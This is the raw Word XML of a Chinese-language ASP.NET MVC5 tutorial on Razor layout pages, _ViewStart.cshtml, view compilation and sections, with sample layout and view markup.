      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>使用布局</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>我们可以在View中新建一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>MVC5 Layout Page(Razor)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>布局视图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>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8" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4230370" cy="2409190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>生成的页面如下所示：</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!DOCTYPE</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FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>html</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html</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head</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meta</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FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>="viewport"</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FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>="width=device-width"</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link</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FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>="~/Content/Views/common.css"</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FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>rel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>="stylesheet"</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title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ViewBag.Title</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title</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head</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body</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h1</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Product Information</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h1</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div</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00"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>RenderBody()</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div</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h2</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View ASP.NET MVC</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h2</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body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>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html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>其中@RenderBody()会调用动作方法所指定的视图内容，并插入到具体视图中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>接着我们在在具体视图中，指定Layout属性为这个布局视图的路径：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exac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Layout = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"~/Views/_BasicLayout.cshtml"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>但这里还有一个问题，就是必须要为每一个视图指定布局文件。这意味着如果修改了布局视图的名称，就必须修改所有引用了该布局的视图。这是易错的过程，不符合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MVC易于维护的主题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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我们可以通过使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>视图起始文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>，来解决该问题。在渲染一个视图时，MVC框架会查找一个叫做</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>_ViewStart.cshtml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>的文件，该文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>默认加载到视图中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>，除非指定视图的Layout为Null。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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理解Razor视图渲染</w:t>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70AD47" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Razor视图引擎会编译应用程序中的视图，以改善性能。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>视图会被编译为C#的类，然后被编译。这就是视图能够如此方便地包含C#代码的原因。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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在访问视图时，MVC会依照当前文件夹下，Shared文件夹按顺序访问。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>视图的全部目的，是让开发人员将域模型部分的内容渲染成用户界面。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>为了达到这一目的，需要对视图添加动态内容。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>动态内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>是运行时生成的，并且随着每个请求而不同。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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8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技术</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="830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何时使用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内联代码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="830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在HTML代码中插入逻辑片段，如if，for等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HTML辅助器代码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="830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用于生成一个独立的HTML元素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分段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="830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用于创建内容分段，这种分段用于布局的特定位置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分部视图</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="830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在多个不同的地方，使用同样的Razor标签和HTML标记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子动作</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="830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当你希望控制器的某个逻辑用于应用程序的多个地方时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分段的Demo，GetSection.cshtml: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 xml:space="preserve">@model </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>string</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ViewBag.Title = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"GetSection"</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Layout = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"~/Views/Shared/_Layout.cshtml"</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@section Header{</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FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>foreach</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">(var item </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>in</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new</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string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[] { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Home"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"List"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Item"</w:t>
      </w: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a</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href</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>="javascript:void(0)"&gt;</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item</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a</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@section Body{</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This is a list of fruits names:</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FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>foreach</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> (var item </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> Model)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span</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&gt;&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>b</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item</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&gt;&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>span</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@section Footer{</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This is Footer</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 xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exac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pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>_Layout.cshtml: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!DOCTYPE</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html</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html</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head</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meta</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charset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>="utf-8"</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meta</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name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>="viewport"</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content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>="width=device-width, initial-scale=1.0"&gt;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title</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ViewBag.Title - My ASP.NET Application</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title</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link</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href</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>="~/Content/Site.css"</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rel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>="stylesheet"</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type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>="text/css"</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link</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href</w:t>
      </w:r>
      <w:r>
        <w:rPr>
